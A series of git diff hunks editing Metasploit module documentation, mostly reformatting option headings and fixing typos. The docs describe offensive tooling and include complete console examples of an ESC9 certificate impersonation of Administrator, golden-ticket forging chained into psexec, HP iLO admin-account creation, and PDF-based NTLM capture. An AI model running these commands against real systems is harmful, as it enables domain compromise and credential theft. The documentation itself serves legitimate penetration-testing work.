 * [Using metasm to avoid antivirus detection ghost writing asm](https://web.archive.org/web/20200330111926/https://www.pentestgeek.com/penetration-testing/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm)

-There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the about articles should get you started.
+There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the above articles should get you started.
@@ -110,7 +110,7 @@ end

    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
-    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+    * **SideEffects** - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

 ### Non-required fields

@@ -41,7 +41,7 @@ include Msf::Auxiliary::Scanner

 A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named "RHOSTS", which allows the user to specify multiple hosts. There's a new "THREADS" option, which allows the number of threads to run during execution. There's also "ShowProgress" and "ShowProgressPercent" for tracking scan progress.

-Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanenr``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
+Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanner``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.

 ## Templates

@@ -142,7 +142,7 @@ Optional options:
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
    * `write-only` -- New tickets are requested and they are stored for reuse.
    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`

 ## Ticket management

@@ -54,9 +54,9 @@ retrieve deployment packages from S3.
 The VPC or Virtual Private Cloud, an isolated local area network. Network access
 can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
-security-groups are used to open access to network ranges and specific TPC/UDP
+security-groups are used to open access to network ranges and specific TCP/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifying a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port.

 ## How it Works

@@ -65,7 +65,7 @@ Web console or the CLI, launching a host in the Cloud requires a fair
 amount of configuration; this module does its best to abstract configuration
 requirements away from the user by auto detecting the VPC, subnets, creating
 security groups, etc. It performs several tasks to launch a host with
-a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
+a public IP address, these are as follows: 1) select a VPC, 2) select a subnet, 3)
 create/select a security group, 4) create/select a key-pair, and 5) launch
 a host.

@@ -80,7 +80,7 @@ an Internet routable IP address. The module dynamically finds which subnet to
 launch the host in. It will use the first subnet it finds having the
 `Auto-assign Public IP` option set, if no such subnet exists, then it will
 select the first subnet having an Internet gateway. To circumvent this process,
-the `SUBNET_ID` advanced option can be set. 
+the `SUBNET_ID` advanced option can be set.

 When launching a Cloud host at least one security group is required. There are
 several advanced options for creating/selecting a security group. The
@@ -88,7 +88,7 @@ several advanced options for creating/selecting a security group. The
 That is, the module will create a security group unless the `SEC_GROUP_ID`
 options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
 to create a security group using the values specified in the `SEC_GROUP_CIDR`,
-`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration. 
+`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.

 The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
 create a key-pair (a named SSH public key). Key-pairs are used to authenticate
@@ -113,7 +113,7 @@ use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
 Basic Options:

 * `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
-* `RHOST`: the AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
+* `RHOST`: The AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
 * `Region`: The default region (us-west-2), must match endpoint
 * `AccessKeyId`: AWS API access key
 * `SecretAccessKey`: AWS API secret access key
@@ -129,10 +129,10 @@ Advanced Options:
 * `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
-* `SEC_GROUP_ID`: the EC2 security group to use
-* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to 0.0.0.0/0
-* `SEC_GROUP_NAME`: the EC2 security group name
-* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
+* `SEC_GROUP_ID`: The EC2 security group to use
+* `SEC_GROUP_CIDR`: The EC2 security group network access CIDR, defaults to 0.0.0.0/0
+* `SEC_GROUP_NAME`: The EC2 security group name
+* `SEC_GROUP_PORT`: The EC2 security group network access port, defaults to tcp:22
 * `SUBNET_ID`: The public subnet to use
 * `UserAgent`: The User-Agent header to use for all requests
 * `VPC_ID`: The EC2 VPC ID
@@ -181,7 +181,7 @@ msf auxiliary(aws_launch_instances) > run
 ...
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address 54.186.158.6
-[*] Auxiliary module execution completed 
+[*] Auxiliary module execution completed
 ```

 When the host has passed its primary system checks, the IP address will be
@@ -12,7 +12,7 @@ Only the deprecated DIAL protocol is supported by this module. Casting via the n

 ## Options

-  **VID**
+### VID

  The YouTube video to be played.  Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)

@@ -36,6 +36,9 @@ The certificate template to issue, e.g., "User".
 ### TARGET_USERNAME
 The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.

+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
 ### UPDATE_LDAP_OBJECT
 The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.

@@ -135,6 +138,72 @@ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
 [*] Auxiliary module execution completed
 ```

+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
+```
+
 ### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
 ```
 msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
@@ -11,11 +11,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi

 ## Options

-  **USERNAME**
+### USERNAME

  The username of the new administrator account. Defaults to a random string.

-  **PASSWORD**
+### PASSWORD

  The password of the new administrator account. Defaults to a random string.

@@ -39,4 +39,4 @@ msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
 [+] Account test_user/test_password created successfully.
 [*] Auxiliary module execution completed
 msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
-```
+```
@@ -23,7 +23,7 @@

 ## Options

-  **rport**
+### rport

  The default is set to `8180`, which is only default on FreeBSD.  All other operating systems, and the software itself, default to `8080`.

@@ -10,11 +10,11 @@ To exploit the vulnerability, the module generates requests and sets a value for

 ## Options

-**PATTERN1** and **PATTERN2**
+### PATTERN1 and PATTERN2

 These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.

-**ID**
+### ID

 The value for query parameter `id` of the page that the news extension is running on.

@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa

 ## Options

-**PATH**
+### PATH

 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)

@@ -298,14 +298,14 @@ host             service  type                 name  content                   i
 TGS using a previously forged golden ticket:

 ```
-# Forge a golden ticket
+# 1. Forge a golden ticket
 msf auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator

 [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
 [*] Auxiliary module execution completed


-# Request a silver ticket:
+# 2. Request a silver ticket:

 msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
 [*] Running module against 10.10.11.5
@@ -317,7 +317,7 @@ msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5
 [+] 10.10.11.5:88 - Received a valid delegation TGS-Response
 [*] Auxiliary module execution completed

-# Use psexec:
+# 3. Use psexec:

 msf exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1

@@ -22,18 +22,18 @@ The required options are based on the action being performed:
 - When changing a password, you must specify the `LDAPUsername` and `LDAPPassword`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
 - The `NEW_PASSWORD` option must always be provided

-**LDAPUsername**
+### LDAPUsername

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**LDAPPassword**
+### LDAPPassword

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

-The new password to set.
+The new password to set.
@@ -9,15 +9,15 @@ Windows is the most ideal target because it supports WPAD by default.

 ## Options

-**NBADDR**
+### NBADDR

 The address that the NetBIOS name (NBNAME) should resolve to.

-**NBNAME**
+### NBNAME

 The NetBIOS name to spoof a reply for.

-**PPSRATE**
+### PPSRATE

 The rate at which to send NetBIOS replies.

@@ -25,19 +25,19 @@ List the steps needed to make sure this thing works

 ## Options

-**RHOSTS**
+### RHOSTS

 Set the target host.

-**USERNAME**
+### USERNAME

 Set the USERNAME of the admin account you want to add.

-**PASSWORD**
+### PASSWORD

 Set the PASSWORD of the admin account you want to add.

-**RETRIES**
+### RETRIES

 You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.

@@ -19,10 +19,10 @@

 ## Options

-  **SQL**
+### SQL

  The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.

-  **TABLE**
+### TABLE

  Table to create the index on.
@@ -103,11 +103,7 @@

 ## Options

-  **RHOST**
-
-  Target device.
-
-  **FUNCTION**
+### FUNCTION

  Either CREDS (default) or ENUM:
  * CREDS attempts to retrieve administrative password and SNMP community strings
@@ -174,4 +170,4 @@ if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.lengt
  ```
  Note that the above response is an example of the utility of using ENUM.  This function code (0x14) returns a netstat-type response.  Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4).  This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.

-  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
+  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
@@ -89,7 +89,7 @@ The CPU mode uses a TCP port depending on the PLC Type, the module will
 automatically detect the type and port to use, but can be overridden with the
 'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.

-**The ACTION option**
+### ACTION

 Action has four possible values:

@@ -25,22 +25,22 @@ The required options are based on the action being performed:
 - When resetting or changing a password, you must specify `NEW_PASSWORD`
 - When resetting or changing an NTLM hash, you must specify `NEW_NTLM`

-**SMBUser**
+### SMBUser

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**SMBPass**
+### SMBPass

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

 The new password to set for `RESET` and `CHANGE` actions. 

-**NEW_NTLM**
+### NEW_NTLM

-The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -41,23 +41,23 @@ msf exploit(psexec) > exploit

 By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.

-**The NAMEDPIPE Option**
+### The NAMEDPIPE Option

 By default, the module will scan for a list of common pipes for any available one. You can specify one by name.

-**The LEAKATTEMPTS Option**
+### The LEAKATTEMPTS Option

 Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.

-**The DBGTRACE Option**
+### The DBGTRACE Option

 Used to debug, gives extremely verbose information.

-**The SMBUser Option**
+### The SMBUser Option

 This is a valid Windows username.

-**The SMBPass option**
+### The SMBPass option

 This can be either the plain text version or the Windows hash.

@@ -65,7 +65,7 @@ This can be either the plain text version or the Windows hash.

 **Automatic Target**

-There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the native upload. Each target is explained below.

 **Powershell Target**

@@ -38,37 +38,37 @@ accordingly.
 12. Apply the acquired session cookie for the vCenter host at the `/ui` path

 ## Options
-**DOMAIN**
+### DOMAIN

 The vSphere SSO domain; by default this is `vsphere.local`. If this does not match the vSphere SSO
 domain, the module will return `HTTP 400: Issuer not trusted` on execution.

-**USERNAME**
+### USERNAME

 The target user within the SSO domain. This must be a valid user as vCenter will happily issue
 SAML assertions for invalid usernames, but the provided session tokens will not function. There
 should be no reason to modify the target user from the default `administrator` in most scenarios.

-**RHOSTS**
+### RHOSTS

 The vCenter appliance IPv4 address or DNS FQDN. This must be reachable over HTTPS for the module
 to function.

-**VHOST**
+### VHOST

 The fully qualified DNS name of the vCenter appliance; this must be present in the Issuer element
 of the assertion for the module to function. If this value does not match the vCenter appliance
 FQDN, the module will return `HTTP 400` during the initial `GET` request.

-**VC_IDP_CERT**
+### VC_IDP_CERT

 The filesystem path to the vCenter SSO IdP certificate in DER or PEM format.

-**VC_IDP_KEY**
+### VC_IDP_KEY

 The filesystem path to the vCenter SSO IdP private key in DER or PEM format.

-**VC_VMCA_CERT**
+### VC_VMCA_CERT

 The filesystem path to the vCenter VMCA certificate in DER or PEM format.

@@ -30,15 +30,15 @@ value is provided for `VC_IP` the module defaults to assigning the loopback IP `
 7. Do: `dump`

 ## Options
-**VMDIR_MDB**
+### VMDIR_MDB

 Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`

-**VMAFD_DB**
+### VMAFD_DB

 Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`

-**VC_IP**
+### VC_IP

 Optional parameter to set the IPv4 address associated with loot entries made by the module.

@@ -21,16 +21,16 @@ Stop  Stop cooking

 ## Options

-**TEMP**
+### TEMP

 Set this to the desired temperature for cooking. Valid values are `Off`,
 `Warm`, `Low`, and `High`.

-**TIME**
+### TIME

 Set this to the desired cook time in full minutes.

-**DefangedMode**
+### DefangedMode

 Set this to `false` to disable defanged mode and enable module
 functionality. Set this only if you're SURE you want to proceed.
@@ -12,7 +12,7 @@ Tested with Schneider TM221CE16R

 ## Options

-**MODE**
+### MODE

 Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.

@@ -47,12 +47,12 @@ on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali

 ## Options

- **TARGETURI**
+### TARGETURI

 Specifies the base target URI to communicate to the HWBridge API.  By default this is '/' but it
 could be things such as '/api' or the randomly generated URI from the local_hwbridge module

- **DEBUGJSON**
+### DEBUGJSON

 Prints out all the JSON packets that come from the HWBridge API.  Useful for troubleshooting
 a device.
@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
 against multiple phone numbers, ideally you want to create the list in a text file (one number per
@@ -20,12 +20,12 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**MMSCARRIER**
+### MMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**TEXTMESSAGE**
+### TEXTMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -35,11 +35,11 @@ set TEXTMESSAGE "Hi, please go: google.com"

 The link should automatically be parsed on the phone and clickable.

-**MMSFILE**
+### MMSFILE

 The attachment to send in the message.

-**MMSFILECTYPE**
+### MMSFILECTYPE

 The content type to use for the attachment. Commonly supported ones include:

@@ -51,28 +51,28 @@ The content type to use for the attachment. Commonly supported ones include:

 To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the MMS messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
 in order to receive the text, such as AT&T.

-**MMSSUBJECT**
+### MMSSUBJECT

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
 multiple phone numbers, ideally you want to create the list in a text file (one number per line),
@@ -20,16 +20,16 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**SMSCARRIER**
+### SMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**SMSSUBJECT**
+### SMSSUBJECT

 The text subject.

-**SMSMESSAGE**
+### SMSMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -39,23 +39,23 @@ set SMSMESSAGE "Hi, please go: google.com"

 The link should automatically be parsed on the phone and clickable.

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the text messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

@@ -73,7 +73,6 @@ The module supports the following carriers:
 * Virgin Mobile

 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
-not supported.

 ### Finding the Carrier for a Phone Number

@@ -24,13 +24,13 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
@@ -23,25 +23,25 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
  An example region would be `us-west-2`.

-  **LIMIT**
+### LIMIT

  Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
  
@@ -24,19 +24,19 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
@@ -21,7 +21,7 @@

 ## Options

-  **TARGETURI**
+### TARGETURI

  The URI where the multipart form is located.  There is no real default and this will change based on the application.

@@ -93,4 +93,4 @@ msf auxiliary(apache_commons_fileupload_dos) > run
 ```

 ![tomcat7_dos](https://cloud.githubusercontent.com/assets/752491/22169486/71980e2e-df42-11e6-8353-4f1e260375ee.png)
- 
+ 
@@ -8,23 +8,23 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info

 ## Options

-**WS_USERNAME**
+### WS_USERNAME

 This is the basic auth username for the spectrum analysis web service.  This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.

-**WS_PASSWORD**
+### WS_PASSWORD

 This is the basic auth password for the spectrum analysis web service.

-**TIMEOUT**
+### TIMEOUT

 This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery.  Typically, the device crashes within about 5 second of the payload being delivered.  The default value of `15` should be seen as the lower bound for `TIMEOUT` values.

-**RHOSTS**
+### RHOSTS

 Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.

-**RPORT**
+### RPORT

 On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.

@@ -12,16 +12,22 @@

 ## Options

- **DOSTYPE**
+### DOSTYPE

-	GENTLE: *Current sessions will continue to work, but not future ones*
-	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+#### GENTLE

-	SOFT: *No past or future sessions will work*
-      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+*Current sessions will continue to work, but not future ones*
+A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.

-	HARD: *ReDOS or Catastrophic Regex Backtracking*
-	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+#### SOFT
+
+*No past or future sessions will work*
+A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+#### HARD
+
+*ReDOS or Catastrophic Regex Backtracking*
+A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.

 ## Scenarios

@@ -19,15 +19,15 @@ FoxIT after version 9.1 is no longer vulnerable.

 ## Options

-**FILENAME**
+### FILENAME
 This option allows you to customise the generated filename.
 This can be changed using set FILENAME test.pdf

-**LHOST**
+### LHOST
 This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25

-**PDFINJECT**
+### PDFINJECT
 This option allows you to inject the UNC code into an existing PDF document
 This can be changed using set PDFINJECT /path/to/file/pdf.pdf

@@ -89,4 +89,4 @@ msf auxiliary(fileformat/badpdf) > exploit
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) > 
 
-  ```
+  ```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
+This can lead to arbitrary command execution via manipulated command line buffers.
+
+References:
+- [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
+- [Windows LNK Research](https://zeifan.my/Windows-LNK/)
+- [Gist Example](https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1)
